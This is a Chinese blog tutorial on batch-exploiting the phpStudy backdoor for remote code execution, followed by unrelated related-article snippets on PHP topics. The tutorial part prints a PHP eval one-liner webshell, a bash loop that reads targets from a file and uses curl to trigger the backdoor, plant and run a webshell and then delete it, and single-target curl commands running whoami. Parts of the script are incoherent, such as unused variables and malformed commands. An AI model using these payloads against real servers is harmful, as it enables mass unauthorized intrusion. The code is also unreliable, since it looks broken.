phpstudy后门rce批量利用脚本的实现

首先,需要说明一下,本文严禁用于非法操作,仅用于安全研究和提高意识。对于任何因为使用本文所述方法而带来的后果,本文作者不承担任何法律责任。

  1. 确定漏洞版本

在使用脚本前,需要先扫描网站是否存在phpstudy后门漏洞,并确定漏洞版本,常见的版本有:

  • phpstudy 2016版 v8.0
  • phpstudy 2018版 v8.0
  • phpstudy 2018版 v8.1
  • phpstudy 2018版 v8.2

  • 获取一句话木马或webshell

在确定了漏洞版本后,需要使用一句话木马或webshell来进行攻击。常见的一句话木马有:

  • php一句话木马
  • asp一句话木马
  • jsp一句话木马
  • perl一句话木马

此处以php一句话木马为例,如下:

<?php @eval($_POST['step']);?>

将木马文件上传至目标站点,获取文件路径。

  1. 编写批量利用脚本

接下来,需要编写批量利用脚本,实现对漏洞网站的批量攻击。脚本示意代码如下:

#!/bin/bash

#后门路径
phpstudy_path="/phpstudy/Home/page/www/"
#webshell地址
shell_url="http://ip:port/3trophp.php"
#后门执行命令
exec_cmd="php z5h.php"

#读取ip.txt文件中的url地址
for url in $(cat ./ip.txt)
do
    #执行后门,上传webshell
    curl "http://${url}/${phpstudy_path}z.php?id=${exec_cmd}"
    #获取webshell执行
    curl "http://${url}/z5h.php" --data "step=${exec_cmd}"
    #删除webshell文件
    curl "http://${url}/z5h.php" --data "step=unlink(/www/z5h.php)"
    #提示执行成功
    echo "${url} ok!"
done
  1. 批量利用漏洞

执行以上脚本即可实现对存活网站的批量攻击。举两个示例说明:

  • 示例1:使用以上脚本攻击ip.txt中列出的所有网站。
./phpstudy-rce.sh
  • 示例2:攻击单个网站,执行whoami命令。
curl "http://target.com:8081/phpstudy/Home/page/www/z.php?id=whoami"
curl "http://target.com:8081/z5h.php" --data "step=php z5h.php"

以上就是用于PHPStudy 后门RCE 批量利用脚本的实现攻略。

本站文章如无特殊说明,均为本站原创,如若转载,请注明出处:phpstudy后门rce批量利用脚本的实现 - Python技术站

(0)
上一篇 2023年5月27日
下一篇 2023年5月27日

相关文章

  • 浅析关于PHP位运算的简单权限设计

    下面是针对“浅析关于PHP位运算的简单权限设计”的详细攻略: 什么是位运算? 在计算机科学中,位运算是对二进制数码直接进行操作的一种技术。PHP中常用的位运算符包括位与(&)、位或(|)、位非(~)、位异或(^)等。 如何设计简单权限系统? 位运算可用于设计简单的权限系统。假设有以下管理员用户角色: 超级管理员:管理员拥有全部权限。 普通管理员:管理…

    PHP 2023年5月26日
    00
  • 总结PHP中初始化空数组的最佳方法

    下面是讲解“总结PHP中初始化空数组的最佳方法”的完整攻略: 为什么要初始化空数组? 在PHP中,数组是一种非常常见的数据类型。它可以用于存储一系列的数据,如数字、字符串、对象等。但是,在一些情况下,我们需要先定义一个空数组,然后再将数据添加到这个数组中。这时候,初始化空数组就非常重要了。在未初始化的情况下,PHP在访问数组元素时可能会出现问题。 初始化空数…

    PHP 2023年5月26日
    00
  • php定义参数数量可变的函数用法实例

    关于“php定义参数数量可变的函数用法实例”,我来给您详细讲解一下。 前置知识 在了解参数数量可变的函数使用方法前,需要先了解一下 PHP 中的函数定义。 在 PHP 中,可以使用 function 关键字来定义函数,如: function functionName($param1, $param2) { // 函数体 } 其中 functionName 是…

    PHP 2023年5月27日
    00
  • php实例分享之二维数组排序

    接下来我将为您详细讲解“php实例分享之二维数组排序”的完整攻略。 一、什么是二维数组排序? 在php中,我们经常需要对数组进行排序,而如果数组是一个多维数组时,我们就需要对其进行二维数组排序。简单来说,二维数组排序就是对一个数组中的子数组进行排序,使得整个数组具有一定的顺序。 二、二维数组排序的方法详解 php中有三种主要的排序方法来对二维数组进行排序,分…

    PHP 2023年5月26日
    00
  • Python udp网络程序实现发送、接收数据功能示例

    下面我将为您详细讲解“Python UDP网络程序实现发送、接收数据功能示例”的完整攻略,包括编写代码、运行程序等步骤。 网络编程基础知识 在进行Python UDP网络程序编写之前,我们需要了解一些网络编程基础知识,如Socket、IP地址、端口、数据传输等。 Socket:Socket是个通信端点,它是IP地址和端口的组合,用于标识网络中的一个进程。 I…

    PHP 2023年5月30日
    00
  • PHP Pipeline 实现中间件的示例代码

    下面是详细的 PHP Pipeline 实现中间件的示例代码攻略: 一、概述 PHP Pipeline 是一种将多个中间件按顺序连接起来执行的机制,可以用于处理 HTTP 请求、消息队列、定时任务等多种应用场景。其中,中间件是指用于处理请求或响应的处理函数,可以通过代码实现对请求或响应进行验证、修改、记录日志等操作。 PHP Pipeline 实现中间件的示…

    PHP 2023年5月27日
    00
  • php获取字符串中各个字符出现次数的方法

    当我们需要统计一个字符串中各个字符出现的次数时,可以使用PHP内置函数count_chars()来实现。具体步骤如下: 1. 使用count_chars() 函数 count_chars()函数接受一个字符串参数,并返回一个关联数组,该数组的键是所有出现过的字符ASCII码,对应的值是该字符在字符串中出现的次数。在返回数组中,未出现的字符将被省略,其它字符则…

    PHP 2023年5月26日
    00
  • PHP读取文件,解决中文乱码UTF-8的方法分析

    PHP读取文件,解决中文乱码UTF-8的方法分析 在PHP中读取文件时,我们经常会遇到中文乱码的问题,尤其是当文件编码为UTF-8时。下面我们将详细讲解如何解决这个问题。 问题分析 在读取UTF-8编码的文件时,PHP默认使用的是ISO-8859-1编码。因此,如果在读取UTF-8文件时不做处理,就会出现中文乱码问题。 解决这个问题一般有两种方法,分别是: …

    PHP 2023年5月26日
    00
合作推广
合作推广
分享本页
返回顶部